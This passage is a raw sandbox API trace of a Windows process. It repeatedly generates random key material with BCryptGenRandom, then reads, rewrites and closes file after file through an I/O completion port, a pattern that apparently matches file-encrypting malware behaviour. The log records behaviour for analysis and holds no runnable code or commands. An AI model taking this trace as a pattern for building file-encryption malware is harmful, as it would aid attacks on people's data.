dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0194.226] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x6023, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0194.227] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0194.237] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3fde, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0194.238] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0194.249] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x52a4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0194.250] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0194.307] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.308] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.308] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0194.308] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.308] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.308] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0194.309] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0194.309] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0194.309] free (_Block=0x3e305b8) [0194.309] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0194.309] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0194.309] free (_Block=0x1fa91d0) [0194.309] free (_Block=0x1fa2ed8) [0194.309] free (_Block=0x1fa90b8) [0194.309] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0194.313] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0194.313] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.314] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.314] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0194.314] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.314] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.315] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0194.315] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0194.315] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0194.315] free (_Block=0x3e305b8) [0194.315] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0194.315] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0194.315] free (_Block=0x1fa91d0) [0194.315] free (_Block=0x1fa2ed8) [0194.315] free (_Block=0x1fa90b8) [0194.315] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0194.316] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0194.840] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0194.842] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0194.893] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.894] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.894] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0194.894] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.895] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.895] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0194.895] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0194.895] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0194.895] free (_Block=0x3e305b8) [0194.895] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0194.895] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0194.896] free (_Block=0x1fa91d0) [0194.896] free (_Block=0x1fa2ed8) [0194.896] free (_Block=0x1fa90b8) [0194.896] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0194.896] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0194.902] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x338a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0194.902] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0194.904] CloseHandle (hObject=0x2a8) returned 1 [0194.904] free (_Block=0x3df0008) [0194.904] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.094] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.095] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.095] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0195.095] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.095] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.095] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0195.095] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.095] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.096] free (_Block=0x3e305b8) [0195.096] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.096] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.096] free (_Block=0x1fa91d0) [0195.096] free (_Block=0x1fa2ed8) [0195.096] free (_Block=0x1fa90b8) [0195.096] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.097] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.122] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x9a80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.122] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.123] CloseHandle (hObject=0x2a8) returned 1 [0195.123] free (_Block=0x3df0008) [0195.123] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.149] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.150] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0195.150] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.150] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0195.150] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.150] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.150] free (_Block=0x3e305b8) [0195.150] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.151] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.151] free (_Block=0x1fa91d0) [0195.151] free (_Block=0x1fa2ed8) [0195.151] free (_Block=0x1fa90b8) [0195.151] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.152] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.154] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x5e40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.155] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.155] CloseHandle (hObject=0x2a8) returned 1 [0195.155] free (_Block=0x3df0008) [0195.155] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.164] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.165] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.165] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0195.165] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.165] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.165] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0195.166] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.166] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.166] free (_Block=0x3e305b8) [0195.166] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.166] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.166] free (_Block=0x1fa91d0) [0195.166] free (_Block=0x1fa2ed8) [0195.166] free (_Block=0x1fa90b8) [0195.166] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.166] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.168] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xa960, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.168] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.169] CloseHandle (hObject=0x2a8) returned 1 [0195.169] free (_Block=0x3df0008) [0195.169] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.190] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.191] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.191] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0195.191] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.192] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.192] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0195.192] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.192] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.192] free (_Block=0x3e305b8) [0195.192] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.192] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.192] free (_Block=0x1fa91d0) [0195.192] free (_Block=0x1fa2ed8) [0195.193] free (_Block=0x1fa90b8) [0195.193] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.193] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.198] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.198] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.201] CloseHandle (hObject=0x2a8) returned 1 [0195.202] free (_Block=0x3df0008) [0195.202] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.211] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.212] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.212] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0195.212] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.212] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.212] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0195.212] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.213] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.213] free (_Block=0x3e305b8) [0195.213] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.213] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.213] free (_Block=0x1fa91d0) [0195.213] free (_Block=0x1fa2ed8) [0195.213] free (_Block=0x1fa90b8) [0195.213] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.213] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.215] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x8060, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.215] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.216] CloseHandle (hObject=0x2a8) returned 1 [0195.216] free (_Block=0x3df0008) [0195.216] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.225] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.226] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.226] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0195.226] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.226] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.226] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0195.226] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.226] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.227] free (_Block=0x3e305b8) [0195.227] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.227] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.227] free (_Block=0x1fa91d0) [0195.227] free (_Block=0x1fa2ed8) [0195.227] free (_Block=0x1fa90b8) [0195.227] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.227] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.229] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xa8c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.229] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.230] CloseHandle (hObject=0x2a8) returned 1 [0195.230] free (_Block=0x3df0008) [0195.230] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.239] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.240] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.240] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0195.240] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.241] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.241] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0195.241] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.241] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.241] free (_Block=0x3e305b8) [0195.241] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.241] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.242] free (_Block=0x1fa91d0) [0195.242] free (_Block=0x1fa2ed8) [0195.242] free (_Block=0x1fa90b8) [0195.242] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.242] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.253] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.254] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.254] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0195.254] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.254] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.254] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0195.255] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 